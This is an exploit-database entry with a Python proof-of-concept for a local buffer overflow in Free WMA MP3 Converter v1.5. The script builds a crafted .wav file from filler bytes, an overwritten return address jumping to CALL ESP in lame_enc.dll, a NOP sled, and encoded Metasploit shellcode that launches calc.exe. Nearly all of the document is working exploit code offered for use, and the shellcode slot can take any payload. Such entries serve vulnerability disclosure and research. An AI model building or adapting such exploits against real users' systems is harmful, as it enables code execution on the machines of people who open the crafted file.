Free WMA MP3 Converter v1.5 (.wav) Local Buffer Overflow Vulnerability

2012-01-24T00:00:00
ID 1337DAY-ID-17433
Type zdt
Reporter Julien Ahrens
Modified 2012-01-24T00:00:00

Description

Exploit for Windows platform in category local exploits

#!/usr/bin/python
 
# Exploit Title: Free WMA MP3 Converter v1.5 (.wav) Local Buffer Overflow Vulnerability
# Version:       1.5
# Date:          2012-01-21
# Author:        Julien Ahrens
# Homepage:      www.inshell.net
# Software Link: http://www.eusing.com
# Tested on:     Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German

from struct import pack

file="exploit.wav"

junk="\x41" * 4112 # filler bytes preceding the overwritten return address
eip=pack('<I',0x1000F406) # CALL ESP from lame_enc.dll
nops = "\x90" * 4

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\xff\x5c\x2f\x0a\x0d\x20'

shellcode = ("\xbf\xca\x58\x4e\xbd\xdb\xd8\xd9\x74\x24\xf4\x5b\x29\xc9" +
"\xb1\x33\x31\x7b\x12\x83\xeb\xfc\x03\xb1\x56\xac\x48\xb9" +
"\x8f\xb9\xb3\x41\x50\xda\x3a\xa4\x61\xc8\x59\xad\xd0\xdc" +
"\x2a\xe3\xd8\x97\x7f\x17\x6a\xd5\x57\x18\xdb\x50\x8e\x17" +
"\xdc\x54\x0e\xfb\x1e\xf6\xf2\x01\x73\xd8\xcb\xca\x86\x19" +
"\x0b\x36\x68\x4b\xc4\x3d\xdb\x7c\x61\x03\xe0\x7d\xa5\x08" +
"\x58\x06\xc0\xce\x2d\xbc\xcb\x1e\x9d\xcb\x84\x86\x95\x94" +
"\x34\xb7\x7a\xc7\x09\xfe\xf7\x3c\xf9\x01\xde\x0c\x02\x30" +
"\x1e\xc2\x3d\xfd\x93\x1a\x79\x39\x4c\x69\x71\x3a\xf1\x6a" +
"\x42\x41\x2d\xfe\x57\xe1\xa6\x58\xbc\x10\x6a\x3e\x37\x1e" +
"\xc7\x34\x1f\x02\xd6\x99\x2b\x3e\x53\x1c\xfc\xb7\x27\x3b" +
"\xd8\x9c\xfc\x22\x79\x78\x52\x5a\x99\x24\x0b\xfe\xd1\xc6" +
"\x58\x78\xb8\x8c\x9f\x08\xc6\xe9\xa0\x12\xc9\x59\xc9\x23" +
"\x42\x36\x8e\xbb\x81\x73\x60\xf6\x88\xd5\xe9\x5f\x59\x64" +
"\x74\x60\xb7\xaa\x81\xe3\x32\x52\x76\xfb\x36\x57\x32\xbb" +
"\xab\x25\x2b\x2e\xcc\x9a\x4c\x7b\xaf\x7d\xdf\xe7\x1e\x18" +
"\x67\x8d\x5e")

try:
    print "[*] Creating exploit file...\n"
    # open in binary mode so the bytes are written unmodified on Windows
    writeFile = open(file, "wb")
    writeFile.write(junk + eip + nops + shellcode)
    writeFile.close()
    print "[*] File successfully created!"
except IOError:
    print "[*] Error while creating file!"


